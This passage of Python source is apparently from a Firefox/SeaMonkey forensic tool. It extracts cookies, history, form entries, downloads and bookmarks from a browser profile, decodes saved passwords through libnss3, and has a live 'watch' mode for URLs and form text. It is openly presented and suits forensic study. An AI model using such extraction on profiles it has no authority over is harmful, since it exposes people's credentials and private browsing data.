show_title("Preferences "+show_sha256(varDir+dirprefs), 302)
firefox = 0
seamonkey = 1
for line in open(varDir+dirprefs):
if "extensions.lastAppVersion" in line:
seamonkey = line.split()[1][:-2].replace("\"", "")
print ("\nBrowser Version: "+line.split()[1][:-2].replace("\"", ""))
if "extensions.lastPlatformVersion" in line and seamonkey != line.split()[1][:-2].replace("\"", ""): # Only Seamonkey
print ("Firefox Version: "+line.split()[1][:-2].replace("\"", ""))
if "browser.download.dir" in line:
print ("\nDownload directory: "+line.split()[1][:-2].replace("\"", ""))
elif "browser.download.lastDir" in line:
print ("Last Download directory: "+line.split()[1][:-2].replace("\"", ""))
elif "browser.cache.disk.capacity" in line:
print ("Browser cache disk capacity: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.ftp_port" in line:
print ("FTP backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.ftp" in line:
print ("\nFTP backup proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.socks_port" in line:
print ("Socks backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.socks" in line:
print ("Socks backup proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.ssl_port" in line:
print ("SSL backup proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.backup.ssl" in line:
print ("SSL backup proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.ftp_port" in line:
print ("FTP proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.ftp" in line:
print ("FTP proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.socks_port" in line:
print ("Socks proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.socks" in line:
print ("Socks proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.ssl_port" in line:
print ("SSL proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.http_port" in line:
print ("Http proxy port: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.http" in line:
print ("Http proxy: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.share_proxy_settings" in line:
print ("Share proxy settings: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.autoconfig_url" in line:
print ("\nURL proxy autoconfig: "+line.split()[1][:-2].replace("\"", ""))
elif "network.proxy.type" in line:
print ("Type Proxy: "+line.split()[1][:-2].replace("\"", "")+" (0: No proxy | 4: Auto detect settings | 1: Manual configuration | 2: URL autoconfig)")
###############################################################################################################
def show_addons_firefox(varDir):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\addons.sqlite"
else:
bbdd = varDir+"/addons.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Addons database not found !")
return
show_title("Addons "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select name,version,creatorURL,homepageURL from addon")
for row in cursor:
print('Name: %s' % row[0])
print('Version: %s' % row[3])
print('Creator URL: %s' % row[1])
print('Homepage URL: %s' % row[2])
print("\n")
count = count +1
contador['Addons'] = count
cursor.close()
conn.close()
def show_extensions_firefox(varDir):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\extensions.sqlite"
else:
bbdd = varDir+"/extensions.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Extensions database not found !")
return
show_title("Extensions "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select type, descriptor,version,releaseNotesURI,datetime(installDate/1000,'unixepoch','localtime'),datetime(UpdateDate/1000,'unixepoch','localtime'),active from addon")
for row in cursor:
print('Type: %s' % row[0])
print('Descriptor: %s' % row[1])
print('Version: %s' % row[2])
print('Release: %s' % row[3])
print('Install date: %s' % row[4])
print('Update date: %s' % row[5])
print('Active: %d' % row[6])
print("\n")
count = count +1
contador['Extensions'] = count
cursor.close()
conn.close()
def show_info_addons(varDir):
if sys.platform.startswith('win') == True:
filepath = varDir+"\\localstore.rdf"
if path.isfile(filepath) == False:
print ("[ERROR]: File localstore.rdf not found !")
return
else:
filead = open(varDir+"\\localstore.rdf")
else:
filepath = varDir+"/localstore.rdf"
if path.isfile(filepath) == False:
print ("[ERROR]: File localstore.rdf not found !")
return
else:
filead = open(varDir+"/localstore.rdf")
show_title("Addons (URLS/PATHS) "+show_sha256(filepath), 302)
lines = filead.readlines()
i = 3
y = 0
while i != len(lines):
if lines[i].find("tp://") != -1 or lines[i].find('label="/') != -1 or lines[i].find(':\\') != -1:
y = i - 1
while lines[y].find("RDF:Description RDF:about=") == -1:
y = y - 1
print ("APP: "+lines[y].replace('<RDF:Description RDF:about="', "").replace('"', "").replace(" ","")+"URL/PATH: "+lines[i].replace('" />', "").replace('label="', " ").replace(" ","")+"\n")
i = i + 1
if y == 0:
print ("The file localstore.rdf does not contain URLs or paths !")
def show_search_engines(varDir):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\search.sqlite"
else:
bbdd = varDir+"/search.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Search engines database not found !")
return
show_title("Search Engines "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select name, value from engine_data")
for row in cursor:
print('Name: %s' % row[0])
print('Value: %s' % str(row[1]))
print("\n")
count = count +1
contador['SearchEngines'] = count
cursor.close()
conn.close()
###############################################################################################################
def show_downloads_firefox(varDir, varDownloadRange1 = "1991-08-06 00:00:00", varDownloadRange2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\downloads.sqlite"
else:
bbdd = varDir+"/downloads.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Downloads database not found !")
return
show_title("Downloads "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute("select name,mimeType,maxBytes/1024,source,target,referrer,tempPath, datetime(startTime/1000000,'unixepoch','localtime') as start,datetime(endTime/1000000,'unixepoch','localtime') as end,state,preferredApplication,preferredAction from moz_downloads where start between ? and ?",[varDownloadRange1,varDownloadRange2])
for row in cursor:
print('Name: %s' % row[0])
print('Mime: %s' % row[1])
print('Size (KB): %d' % row[2])
print('Source: %s' % row[3])
print('Download directory: %s' % row[4])
print('Referrer: %s' % row[5])
print('Path temp: %s' % row[6])
print('startTime: %s' % row[7])
print('Endtime: %s' % row[8])
print('State (4 pause, 3 cancell, 1 completed, 0 downloading): %s' % row[9])
print('Preferred application: %s' % row[10])
print('Preferred action: %d' % row[11])
print ("\n")
count = count +1
contador['Downloads'] = count
def show_downloads_history_firefox(varDir, varDownloadRange1 = "1991-08-06 00:00:00", varDownloadRange2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\places.sqlite"
else:
bbdd = varDir+"/places.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: History Downloads database not found !")
return
show_title("History Downloads "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute('select datetime(ann.lastModified/1000000,"unixepoch","localtime") as modified, moz.url, ann.content from moz_annos ann, moz_places moz where moz.id=ann.place_id and ann.content not like "UTF-%" and ann.content not like "ISO-%" and ann.content like "file%" and modified between ? and ?',[varDownloadRange1,varDownloadRange2])
for row in cursor:
print('Date: %s' % row[0])
print('URL: %s' % row[1])
print('Download: %s' % row[2])
print ("\n")
count = count +1
contador['Downloads_History'] = count
def show_downloadsdir_firefox(varDir):
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\content-prefs.sqlite"
else:
bbdd = varDir+"/content-prefs.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Download directories database not found !")
return
show_title("Directories "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
conn.text_factory = str
cursor = conn.cursor()
cursor.execute('select distinct value from prefs where value like "/%"')
for row in cursor:
print('Downloads directories: %s' % row[0])
cursor.close()
conn.close()
###############################################################################################################
def show_forms_firefox(varDir,varFormsValue = '%', varFormRange1 = "1991-08-06 00:00:00",varFormRange2 = "3000-01-01 00:00:00" ):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\formhistory.sqlite"
else:
bbdd = varDir+"/formhistory.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Forms database not found !")
return
show_title("Forms "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
cursor = conn.cursor()
cursor.execute("select fieldname,value,timesUsed,datetime(firstUsed/1000000,'unixepoch','localtime') as last,datetime(lastUsed/1000000,'unixepoch','localtime') from moz_formhistory where value like ? escape '\\' and last between ? and ?",[varFormsValue,varFormRange1,varFormRange2])
for row in cursor:
print('Name: %s' % row[0])
print('Value: %s' % row[1])
print('Times Used: %d' % row[2])
print('First Used: %s' % row[3])
print('LastUsed: %s' % row[4])
print("\n")
count = count +1
contador['Forms'] = count
cursor.close()
conn.close()
###############################################################################################################
def show_history_firefox(varDir, varURL = '%', varFrequency = 1, varTitle = '%', varDate = '%', varRange1 = "1991-08-06 00:00:00", varRange2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\places.sqlite"
else:
bbdd = varDir+"/places.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: History database not found !")
return
show_title("History "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
cursor = conn.cursor()
if varFrequency == 1:
cursor.execute("select datetime(last_visit_date/1000000,'unixepoch','localtime') as last, title, url, visit_count from moz_places where url like ? and title like ? escape '\\' and (last like ? and last is not null) and last between ? and ? ORDER BY last COLLATE NOCASE ",[('%'+varURL+'%'), varTitle,('%'+varDate+'%'),varRange1,varRange2])
else:
cursor.execute("select datetime(last_visit_date/1000000,'unixepoch','localtime') as last, title, url, visit_count from moz_places where url like ? title like ? escape '\\' and (last like ? and last is not null) and last between ? and ? ORDER BY visit_count COLLATE NOCASE DESC",[('%'+varURL+'%'), varTitle,('%'+varDate+'%'),varRange1,varRange2])
for row in cursor:
print('Last visit: %s' % row[0])
print('Title: %s' % row[1])
print('URL: %s' % row[2])
print('Frequency: %d' % row[3])
print("\n")
count = count +1
contador['History'] = count
cursor.close()
conn.close()
###############################################################################################################
def show_bookmarks_firefox(varDir, varBookmarkRange1 = "1991-08-06 00:00:00", varBookmarkRange2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\places.sqlite"
else:
bbdd = varDir+"/places.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Bookmarks database not found !")
return
show_title("Bookmarks "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
cursor = conn.cursor()
cursor.execute('select bm.title,pl.url,datetime(bm.dateAdded/1000000,"unixepoch","localtime"),datetime(bm.lastModified/1000000,"unixepoch","localtime") as last from moz_places pl,moz_bookmarks bm where bm.fk=pl.id and last between ? and ?',[varBookmarkRange1,varBookmarkRange2] )
for row in cursor:
print('Title: %s' % row[0])
print('URL: %s' % row[1])
print('Date add: %s' % row[2])
print('Last modified: %s' % row[3])
print("\n")
count = count +1
contador['Bookmarks'] = count
cursor.close()
conn.close()
###############################################################################################################
def show_passwords_firefox(varDir):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\signons.sqlite"
else:
bbdd = varDir+"/signons.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Signons database not found !")
return
show_title("Exceptions/Passwords "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
cursor = conn.cursor()
cursor.execute('select hostname from moz_disabledHosts')
for row in cursor:
print('Exception Web: %s' % row[0])
print ("\n")
cursor.execute('select formSubMitURL,usernameField,passwordField ,encryptedUsername,encryptedPassword,encType,datetime(timeCreated/1000,"unixepoch","localtime"),datetime(timeLastUsed/1000,"unixepoch","localtime"),datetime(timePasswordChanged/1000,"unixepoch","localtime"),timesUsed FROM moz_logins')
for row in cursor:
print('Web: %s' % row[0])
print('User field: %s' % row[1])
print('Password field: %s' % row[2])
print('User login (crypted): %s' % row[3])
print('Password login (crypted): %s' % row[4])
#print('Encripton type: %s' % row[5])
print('Created: %s' % row[6])
print('Last used: %s' % row[7])
print('Change: %s' % row[8])
print('Frequency: %s' % row[9])
print("\n")
count = count +1
contador['Passwords'] = count
if sys.platform.startswith('win') == False and sys.version.startswith('2.') == True and count > 0:
readsignonDB(varDir)
elif count == 0:
print ("Users not found!")
else:
print ("WARNING: Decode password only in GNU/Linux with python 2.x\nEXAMPLE: python2.7 dumpzilla.py yle8qt6e.default --Passwords")
cursor.close()
conn.close()
###############################################################################################################
def show_cache_offline(varDir,varCacheoffRange1 = "1991-08-06 00:00:00", varCacheoffRange2 = "3000-01-01 00:00:00"):
count = 0
if sys.platform.startswith('win') == True:
bbdd = varDir+"\\OfflineCache\\index.sqlite"
else:
bbdd = varDir+"/OfflineCache/index.sqlite"
if path.isfile(bbdd) == False:
print ("[ERROR]: Cache Offline (HTML5) database not found !")
return
show_title("Cache offline Html5 "+show_sha256(bbdd), 302)
conn = sqlite3.connect(bbdd)
cursor = conn.cursor()
cursor.execute("select ClientID,key,DataSize,FetchCount,datetime(LastFetched/1000000,'unixepoch','localtime'),datetime(LastModified/1000000,'unixepoch','localtime') as last,datetime(ExpirationTime/1000000,'unixepoch','localtime') from moz_cache where last between ? and ?",[varCacheoffRange1,varCacheoffRange2])
for row in cursor:
print('Url: %s' % row[0])
print('File: %s' % row[1])
print('Data Size: %s' % row[2])
print('FetchCount: %s' % row[3])
print('Last Fetched: %s' % row[4])
print('Last Modified: %s' % row[5])
print('Expiration: %s' % row[6])
print("\n")
count = count + 1
cursor.close()
conn.close()
contador['Cacheoffline'] = count
##############################################################################################################
def show_cache_offline_extract(varDir, directory):
import magic
count = 0
if sys.platform.startswith('win') == True:
dircacheextract = "\\OfflineCache"
else:
dircacheextract = "/OfflineCache/"
if not path.exists(varDir+dircacheextract):
print ("[ERROR]: OfflineCache not found !")
return
if sys.platform.startswith('win') == True: # Windows
for dirname, dirnames, filenames in walk(varDir+dircacheextract):
for filename in filenames:
file = path.join(dirname, filename)
mime = magic.Magic(magic_file=magicpath)
if not path.exists(directory):
makedirs(directory)
if mime.from_file(file).decode('unicode-escape').startswith("gzip"):
if not path.exists(directory+"\\files_gzip"):
makedirs(directory+"\\files_gzip")
shutil.copy2(file, directory+"\\files_gzip\\"+filename+".gz")
elif mime.from_file(file).decode('unicode-escape').find("image") != -1 :
if not path.exists(directory+"\\images"):
makedirs(directory+"\\images")
if mime.from_file(file).decode('unicode-escape').find("JPEG") != -1 or mime.from_file(file).decode('unicode-escape').find("jpg") != -1:
shutil.copy2(file, directory+"\\images\\"+filename+".jpg")
elif mime.from_file(file).decode('unicode-escape').find("GIF") != -1:
shutil.copy2(file, directory+"\\images\\"+filename+".gif")
elif mime.from_file(file).decode('unicode-escape').find("BMP") != -1:
shutil.copy2(file, directory+"\\images\\"+filename+".bmp")
elif mime.from_file(file).decode('unicode-escape').find("PNG") != -1:
shutil.copy2(file, directory+"\\images\\"+filename+".png")
elif mime.from_file(file).decode('unicode-escape').find("X-ICON") != -1:
shutil.copy2(file, directory+"\\images\\"+filename+".ico")
else:
shutil.copy2(file, directory+"/images/"+filename)
elif mime.from_file(file).decode('unicode-escape').find("text") != -1:
if not path.exists(directory+"\\text"):
makedirs(directory+"\\text")
shutil.copy2(file, directory+"\\text\\"+filename+".txt")
else:
shutil.copy2(file, directory+"\\"+filename)
count = count + 1
if filename != "index.sqlite":
print ("Copying "+filename+": "+mime.from_file(file).decode('unicode-escape'))
contador['Cacheoffline_extract'] = count -1
remove(directory+"\\index.sqlite")
else: # Unix systems
for dirname, dirnames, filenames in walk(varDir+dircacheextract):
for filename in filenames:
file = path.join(dirname, filename)
mime = magic.Magic(mime=True)
if not path.exists(directory):
makedirs(directory)
if mime.from_file(file).decode('unicode-escape') == "application/x-gzip":
if not path.exists(directory+"/files_gzip/"):
makedirs(directory+"/files_gzip/")
shutil.copy2(file, directory+"/files_gzip/"+filename+".gz")
elif mime.from_file(file).decode('unicode-escape').startswith("image"):
if not path.exists(directory+"/images/"):
makedirs(directory+"/images/")
if mime.from_file(file).decode('unicode-escape').find("jpeg") != -1 or mime.from_file(file).decode('unicode-escape').find("jpg") != -1:
shutil.copy2(file, directory+"/images/"+filename+".jpg")
elif mime.from_file(file).decode('unicode-escape').find("gif") != -1:
shutil.copy2(file, directory+"/images/"+filename+".gif")
elif mime.from_file(file).decode('unicode-escape').find("bmp") != -1:
shutil.copy2(file, directory+"/images/"+filename+".bmp")
elif mime.from_file(file).decode('unicode-escape').find("png") != -1:
shutil.copy2(file, directory+"/images/"+filename+".png")
elif mime.from_file(file).decode('unicode-escape').find("x-icon") != -1:
shutil.copy2(file, directory+"/images/"+filename+".ico")
else:
shutil.copy2(file, directory+"/images/"+filename)
elif mime.from_file(file).decode('unicode-escape').startswith("text"):
if not path.exists(directory+"/text/"):
makedirs(directory+"/text/")
shutil.copy2(file, directory+"/text/"+filename+".txt")
else:
shutil.copy2(file, directory+"/"+filename)
count = count + 1
contador['Cacheoffline_extract'] = count -1
remove(directory+"/index.sqlite")
##############################################################################################################
def show_thumbnails(varDir, directory = "null"):
count = 0
if sys.platform.startswith('win') == True:
dthumbails = "\\thumbnails"
else:
dthumbails = "/thumbnails/"
if not path.exists(varDir+dthumbails):
print ("[ERROR]: Thumbnails not found !")
return
show_title("Thumbnails images", 243)
for dirname, dirnames, filenames in walk(varDir+dthumbails):
for filename in filenames:
if directory == 'null':
file = path.join(dirname, filename)
print (file)
else:
file = path.join(dirname, filename)
if not path.exists(directory):
makedirs(directory)
shutil.copy2(file, directory)
print ("Copy "+file+" in "+directory)
count = count + 1
contador['Thumbnails'] = count
##############################################################################################################
def show_title(varText,varSize):
varText = "\n"+varText+"\n"
print ("\n")
print (varText.center(varSize, "="))
print ("\n")
##############################################################################################################
def show_cert_override(varDir):
if sys.platform.startswith('win') == True:
if path.isfile(varDir+"\\cert_override.txt"):
lineas = open(varDir+"\\cert_override.txt").readlines()
show_title("Cert override "+show_sha256(varDir+"\\cert_override.txt"), 302)
else:
return
else:
if path.isfile(varDir+"/cert_override.txt"):
lineas = open(varDir+"/cert_override.txt").readlines()
show_title("Cert override "+show_sha256(varDir+"/cert_override.txt"), 302)
else:
return
contador['Cert'] = len(lineas)-2
nl = 0
for certificado in lineas:
if lineas[nl].split()[0].startswith("#") == False:
print("Site: %s" % lineas[nl].split()[0])
print("Hash Algorithm: %s" % lineas[nl].split()[1])
print(lineas[nl].split()[2])
print ("\n")
nl = nl + 1
###############################################################################################################
def show_watch(varDir,watchtext = 1):
if sys.platform.startswith('win') == True:
print ("\n--Watch option not supported on Windows!\n")
return
elif python3_path == "":
print ("\n[ERROR]: Edit the header of dumpzilla.py and add the python3 path to the variable 'python3_path'.\nExample: python3_path = '/usr/bin/python3.3'\n")
sys.exit()
elif watchtext == 1:
cmd = ["watch", "-n", "4",python3_path, path.abspath(__file__), varDir, "--Session2"]
call(cmd)
else:
cmd = ["watch", "-n", "4",python3_path, path.abspath(__file__), varDir, "--Session2", "| grep --group-separator '' -A 2 -B 2 -i", "'"+watchtext+"'" ]
call(cmd)
###############################################################################################################
def show_help():
print ("""
Version: 15/03/2013
Usage: python dumpzilla.py browser_profile_directory [Options]
Options:
--All (Shows everything but the DOM data. Doesn't extract thumbnails or HTML 5 offline)
--Cookies [-showdom -domain <string> -name <string> -hostcookie <string> -access <date> -create <date> -secure <0/1> -httponly <0/1> -range_last -range_create <start> <end>]
--Permissions [-host <string>]
--Downloads [-range <start> <end>]
--Forms [-value <string> -range_forms <start> <end>]
--History [-url <string> -title <string> -date <date> -range_history <start> <end> -frequency]
--Bookmarks [-range_bookmarks <start> <end>]
--Cacheoffline [-range_cacheoff <start> <end> -extract <directory>]
--Thumbnails [-extract_thumb <directory>]
--Range <start date> <end date>
--Addons
--Passwords (Decode only in Unix)
--Certoverride
--Session
--Watch [-text <string>] (Shows in daemon mode the URLs and text form in real time. -text' Option allow filter, support all grep Wildcards. Exit: Ctrl + C. only Unix).
Wildcards: '%' Any string of any length (Including zero length)
'_' Single character
'\\' Escape character
Date syntax: YYYY-MM-DD HH:MM:SS
Win profile: 'C:\\Documents and Settings\\xx\\Application Data\\Mozilla\\Firefox\\Profiles\\xxxx.default'
Unix profile: '/home/xx/.mozilla/seamonkey/xxxx.default/'\n""")
sys.exit()
############################################################################################################### Main
if sys.platform.startswith('win') == False:
libnss = CDLL("libnss3.so")
pwdata = secuPWData()
pwdata.source = PW_NONE
pwdata.data=0
uname = SECItem()
passwd = SECItem()
dectext = SECItem()
showAll = 1
count = 0
contador = {'Cookies': "0", 'Preferences': "0", 'Addons': "0",'Extensions': "0", 'Downloads': "0",'Downloads_History': "0", 'Forms': "0", 'History': "0", 'Bookmarks': "0", 'DOM': "0", 'DOMshow': "0", 'SearchEngines': "0", 'Passwords':"0", 'Passwords_decode': "0", 'Cacheoffline': "0", 'Cacheoffline_extract': "0", 'Cert': "0",'Thumbnails': "0", 'Session1': "0", 'Session2': "0"}
if len(sys.argv) == 1:
show_help()
else:
varDir = sys.argv[1]
if path.isdir(varDir) == True and len(sys.argv) == 2:
show_help()
elif path.isdir(varDir) == True and len(sys.argv) > 2:
varCookieOK = 1
varDom = 1
varDomain = "%"
varName = "%"
varHost = "%"
varLastacess = "%"
varCreate = "%"
varSecure = "%"
varHttp = "%"
varRangeLast1 = "1991-08-06 00:00:00"
varRangeLast2 = "3000-01-01 00:00:00"
varRangeCreate1 = "1991-08-06 00:00:00"
varRangeCreate2 = "3000-01-01 00:00:00"
varPermissionsOK = 1
varHostPreferences = "%"
varAddonOK = 1
varDownloadsOK = 1
varDownloadRange1 = "1991-08-06 00:00:00"
varDownloadRange2 = "3000-01-01 00:00:00"
varFormsOK = 1
varFormsValue = '%'
varFormRange1 = "1991-08-06 00:00:00"
varFormRange2 = "3000-01-01 00:00:00"
varHistoryOK = 1
varFrequency = 1
varURL = '%'
varTitle = '%'
varDate = '%'
varRange1 = "1991-08-06 00:00:00"
varRange2 = "3000-01-01 00:00:00"
varBookmarksOK = 1
varBookmarkRange1 = "1991-08-06 00:00:00"
varBookmarkRange2 = "3000-01-01 00:00:00"
varPasswordsOK = 1
varCacheoffOK = 1
varCacheoffRange1 = "1991-08-06 00:00:00"
varCacheoffRange2 = "3000-01-01 00:00:00"
varExtract = 1
varCertOK = 1
varThumbOK = 1
directory = 'null'
varSessionOK = 1
varSession2OK = 1
watchtext = 1
varWatchOK = 1
for arg in sys.argv:
if arg.startswith("-") == True and count > 1:
if arg != "--All" and arg != "--Range" and arg != "--Cookies" and arg != "-showdom" and arg != "-domain" and arg != "-name" and arg != "-hostcookie" and arg != "-access" and arg != "-create" and arg != "-secure" and arg != "-httponly" and arg != "-range_last" and arg != "-range_last" and arg != "-range_create" and arg != "--Permissions" and arg != "-host" and arg != "--Addons" and arg != "--Downloads" and arg != "-range" and arg != "--Forms" and arg != "-value" and arg != "-range_forms" and arg != "--History" and arg != "-url" and arg != "-frequency" and arg != "-title" and arg != "-date" and arg != "-range_history" and arg != "--Bookmarks" and arg != "-range_bookmarks" and arg != "--Passwords" and arg != "--Cacheoffline" and arg != "-range_cacheoff" and arg != "-extract" and arg != "--Certoverride" and arg != "--Thumbnails" and arg != "-extract_thumb" and arg != "--Session" and arg != "--Watch" and arg != "-text" and arg != "--Session2":
print("\n[ERROR] "+str(arg)+" : Invalid argument !")
show_help()
if arg == "--All":
showAll = 0
if arg == "--Range":
varCookieOK = 0
varRangeLast1 = sys.argv[count+1]
varRangeLast2 = sys.argv[count+2]
varDownloadsOK = 0
varDownloadRange1 = sys.argv[count+1]
varDownloadRange2 = sys.argv[count+2]
varFormsOK = 0
varFormRange1 = sys.argv[count+1]
varFormRange2 = sys.argv[count+2]
varHistoryOK = 0
varRange1 = sys.argv[count+1]
varRange2 = sys.argv[count+2]
varBookmarksOK = 0
varBookmarkRange1 = sys.argv[count+1]
varBookmarkRange2 = sys.argv[count+2]
varCacheoffOK = 0
varCacheoffRange1 = sys.argv[count+1]
varCacheoffRange2 = sys.argv[count+2]
if arg == "--Cookies":
varCookieOK = 0
elif arg == "-showdom" and varCookieOK == 0:
varDom = 0
elif arg == "-domain" and varCookieOK == 0:
varDomain = sys.argv[count+1]
elif arg == "-name" and varCookieOK == 0:
varName = sys.argv[count+1]
elif arg == "-hostcookie" and varCookieOK == 0:
varHost = sys.argv[count+1]
elif arg == "-access" and varCookieOK == 0:
varLastacess = sys.argv[count+1]
elif arg == "-create" and varCookieOK == 0:
varCreate = sys.argv[count+1]
elif arg == "-secure" and varCookieOK == 0:
varSecure = sys.argv[count+1]
elif arg == "-httponly" and varCookieOK == 0:
varHttp = sys.argv[count+1]
elif arg == "-range_last" and varCookieOK == 0:
varRangeLast1 = sys.argv[count+1]
varRangeLast2 = sys.argv[count+2]
elif arg == "-range_create" and varCookieOK == 0:
varRangeCreate1 = sys.argv[count+1]
varRangeCreate2 = sys.argv[count+2]
elif arg == "--Permissions":
varPermissionsOK = 0
elif arg == "-host" and varPermissionsOK == 0:
varHostPreferences = sys.argv[count+1]
elif arg == "--Addons":
varAddonOK = 0
elif arg == "--Downloads":
varDownloadsOK = 0
elif arg == "-range" and varDownloadsOK == 0:
varDownloadRange1 = sys.argv[count+1]
varDownloadRange2 = sys.argv[count+2]
elif arg == "--Forms":
varFormsOK = 0
elif arg == "-value" and varFormsOK == 0:
varFormsValue = sys.argv[count+1]
elif arg == "-range_forms" and varFormsOK == 0:
varFormRange1 = sys.argv[count+1]
varFormRange2 = sys.argv[count+2]
elif arg == "--History":
varHistoryOK = 0
elif arg == "-url" and varHistoryOK == 0:
varURL = sys.argv[count+1]
elif arg == "-frequency" and varHistoryOK == 0:
varFrequency = 0
elif arg == "-title" and varHistoryOK == 0:
varTitle = sys.argv[count+1]
elif arg == "-date" and varHistoryOK == 0:
varDate = sys.argv[count+1]
elif arg == "-range_history" and varHistoryOK == 0:
varRange1 = sys.argv[count+1]
varRange2 = sys.argv[count+2]
elif arg == "--Bookmarks":
varBookmarksOK = 0
elif arg == "-range_bookmarks" and varBookmarksOK == 0:
varBookmarkRange1 = sys.argv[count+1]
varBookmarkRange2 = sys.argv[count+2]
elif arg == "--Passwords":
varPasswordsOK = 0
elif arg == "--Cacheoffline":
varCacheoffOK = 0
elif arg == "-range_cacheoff" and varCacheoffOK == 0:
varCacheoffRange1 = sys.argv[count+1]
varCacheoffRange2 = sys.argv[count+2]
elif arg == "-extract" and varCacheoffOK == 0:
varExtract = 0
directory = sys.argv[count+1]
elif arg == "--Certoverride":
varCertOK = 0
elif arg == "--Thumbnails":
varThumbOK = 0
elif arg == "-extract_thumb" and varThumbOK == 0:
directory = sys.argv[count+1]
elif arg == "--Session":
varSessionOK = 0
elif arg == "--Session2":
varSession2OK = 0
elif arg == "--Watch":
varWatchOK = 0
elif arg == "-text" and varWatchOK == 0:
watchtext = sys.argv[count+1]
count = count+1
show_info_header()
if showAll == 0:
All_execute(varDir)
if varCookieOK == 0:
show_cookies_firefox(varDir,varDom,varDomain,varName,varHost,varLastacess,varCreate,varSecure,varHttp,varRangeLast1,varRangeLast2,varRangeCreate1,varRangeCreate2)
if varPermissionsOK == 0:
show_permissions_firefox(varDir,varHostPreferences)
show_preferences_firefox(varDir)
if varAddonOK == 0:
show_addons_firefox(varDir)
show_extensions_firefox(varDir)
show_search_engines(varDir)
show_info_addons(varDir)
if varDownloadsOK == 0:
show_downloads_firefox(varDir,varDownloadRange1,varDownloadRange2)
show_downloads_history_firefox(varDir,varDownloadRange1,varDownloadRange2)
show_downloadsdir_firefox(varDir)
if varFormsOK == 0:
show_forms_firefox(varDir,varFormsValue,varFormRange1,varFormRange2)
if varHistoryOK == 0:
show_history_firefox(varDir, varURL, varFrequency, varTitle, varDate, varRange1, varRange2)
if varBookmarksOK == 0:
show_bookmarks_firefox(varDir,varBookmarkRange1,varBookmarkRange2)
if varPasswordsOK == 0:
show_passwords_firefox(varDir)
if varCacheoffOK == 0:
show_cache_offline(varDir,varCacheoffRange1,varCacheoffRange2)
if varCacheoffOK == 0 and varExtract == 0:
show_cache_offline_extract(varDir, directory)
if varCertOK == 0:
show_cert_override(varDir)
if varThumbOK == 0:
show_thumbnails(varDir, directory)
if varSessionOK == 0:
show_session(varDir)
if varSession2OK == 0:
extract_data_session_watch(varDir)
if varWatchOK == 0:
show_watch(varDir,watchtext)
if varSession2OK == 1:
show_title("Total information", 243)
if varCookieOK == 0 or showAll == 0:
print ("Total Cookies: "+str(contador['Cookies']))
print ("Total DOM Data displayed: "+str(contador['DOM']))
if varDom == 1 and showAll == 1:
print (contador['DOMshow'])
if varPermissionsOK == 0 or showAll == 0:
print ("Total Permissions: "+str(contador['Preferences']))
if varAddonOK == 0 or showAll == 0:
print ("Total Addons: "+str(contador['Addons']))
print ("Total Extensions (Extensions / Themes): "+str(contador['Extensions']))
print ("Total Search Engines: "+str(contador['SearchEngines']))
if varDownloadsOK == 0 or showAll == 0:
print ("Total Downloads: "+str(contador['Downloads']))
print ("Total History downloads: "+str(contador['Downloads_History']))
if varFormsOK == 0 or showAll == 0:
print ("Total Forms: "+str(contador['Forms']))
if varHistoryOK == 0 or showAll == 0:
print ("Total urls in History: "+str(contador['History']))
if varBookmarksOK == 0 or showAll == 0:
print ("Total urls in Bookmarks: "+str(contador['Bookmarks']))
if varPasswordsOK == 0 or showAll == 0:
